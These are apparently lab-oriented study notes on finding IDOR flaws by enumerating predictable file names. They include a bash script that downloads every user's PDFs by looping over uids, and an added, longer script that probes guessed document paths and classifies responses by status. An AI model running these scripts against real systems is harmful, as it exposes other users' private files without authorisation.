Static file enumeration is a technique for identifying IDORs where the files follow a predictable naming pattern, such as /documents/report_2_10_2022.pdf and /document/class_1_09_2022.pdf: once the pattern is known, other users' files can be requested by guessing names instead of needing a link to them.
#IDOR identification & testing: Plain-Text URL Parameter value
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?uid=1 or ?filename=file_1.pdf
* study the HTTP requests to look for URL parameters or APIs with an object reference
- the object reference may also be carried elsewhere in the request, e.g. in cookies or other HTTP headers.
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?uid={arbitraryValue} or ?filename=file_{arbitraryValue}.pdf
* try incrementing the values of the object references and compare the responses (status code, length, content) to confirm that another user's data is returned
#download all documents from all employees with uids between 1-10
root@oco:~$ nano idorStaticFileEnumeration.sh
#!/bin/bash
# base URL of the target; SERVER_IP:PORT are placeholders for the lab host
url="http://SERVER_IP:PORT"
# walk uids 1-10, pull every /documents/...pdf link from each employee's
# document listing and download it; the extracted links already start
# with "/", so they are appended to $url without an extra slash
for i in {1..10}; do
    for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "/documents.*?\.pdf"); do
        wget -q "$url$link"
    done
done
* -o (--only-matching): prints only the matching part of each line instead of the whole line, so each link comes out on its own line.
* -P (--perl-regexp): enables Perl-compatible regular expressions; the lazy quantifier .*? used above needs PCRE, so the pattern stops at the first .pdf on a line instead of swallowing everything up to the last one. Not every grep supports -P (BSD/macOS and BusyBox greps do not); on those, rewrite the pattern with -E and a character class instead of .*?.
root@oco:~$ chmod +x idorStaticFileEnumeration.sh
root@oco:~$ ./idorStaticFileEnumeration.sh
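The script above only harvests links that the listing page happens to expose. The following is an added example (my own code, not from the page or the lab it describes) that also enumerates the predictable file names directly, which is what static file enumeration means, and classifies each probe by HTTP status so that access-controlled files (403) are not confused with missing ones. It assumes a hypothetical naming pattern /documents/report_<uid>_<MM>_<YYYY>.pdf and the same /documents.php?uid= listing endpoint; SERVER_IP:PORT is a placeholder (override with TARGET_URL), and the sample HTML is constructed, not captured from a real target. The link parser uses grep -E rather than -P so it also runs on greps without PCRE support.

```bash
#!/bin/bash
# Added example, not from the original page. Assumptions (hypothetical):
# the app serves /documents/report_<uid>_<MM>_<YYYY>.pdf and a listing at
# /documents.php?uid=<uid>; SERVER_IP:PORT is a placeholder for the lab host.

url="${TARGET_URL:-http://SERVER_IP:PORT}"

# Pull every /documents/...pdf reference out of HTML on stdin, deduplicated.
# -E (POSIX ERE) with a character class replaces the page's -P ".*?" so the
# match still stops at the first .pdf without needing PCRE.
extract_document_links() {
    grep -oE '/documents/[A-Za-z0-9._-]+\.pdf' | sort -u
}

# Print candidate paths for the assumed pattern report_<uid>_<MM>_<YYYY>.pdf
# for uids $1..$2 and every month of year $3.
build_candidate_paths() {
    local first="$1" last="$2" year="$3" uid month
    for uid in $(seq "$first" "$last"); do
        for month in $(seq 1 12); do
            printf '/documents/report_%s_%02d_%s.pdf\n' "$uid" "$month" "$year"
        done
    done
}

# Classify one path by HTTP status: 200 = readable (IDOR candidate),
# 403 = exists but access-controlled, anything else = treat as missing.
probe_path() {
    local path="$1" code
    code=$(curl -s -o /dev/null -w '%{http_code}' "$url$path")
    case "$code" in
        200) printf 'FOUND    %s\n' "$path" ;;
        403) printf 'DENIED   %s\n' "$path" ;;
        *)   printf 'MISSING  %s (%s)\n' "$path" "$code" ;;
    esac
}

# Download whatever the listing exposes for uids 1-10, then probe the
# predictable names for the same uids. Only runs when invoked with --run.
run_enumeration() {
    local i link path
    for i in $(seq 1 10); do
        for link in $(curl -s "$url/documents.php?uid=$i" | extract_document_links); do
            wget -q "$url$link"
        done
    done
    build_candidate_paths 1 10 2022 | while read -r path; do
        probe_path "$path"
    done
}

# Constructed sample listing (not from a real target) so the parser can be
# exercised offline; note the duplicate link and the non-PDF asset.
sample_html='<html><body>
<a href="/documents/report_2_10_2022.pdf">Report</a>
<a href="/documents/report_2_10_2022.pdf">Report again</a>
<a href="/documents/class_1_09_2022.pdf">Class</a>
<a href="/static/logo.png">Logo</a>
</body></html>'

if [ "${1:-}" = "--run" ]; then
    run_enumeration
fi
```

Invoke it with --run to hit the target; without the flag it only defines the functions, so extract_document_links and build_candidate_paths can be checked offline against the constructed sample before any traffic is sent. The 403 bucket is worth keeping: a DENIED hit still confirms the file exists and the naming pattern is right, which is useful evidence even when that particular object is not exposed.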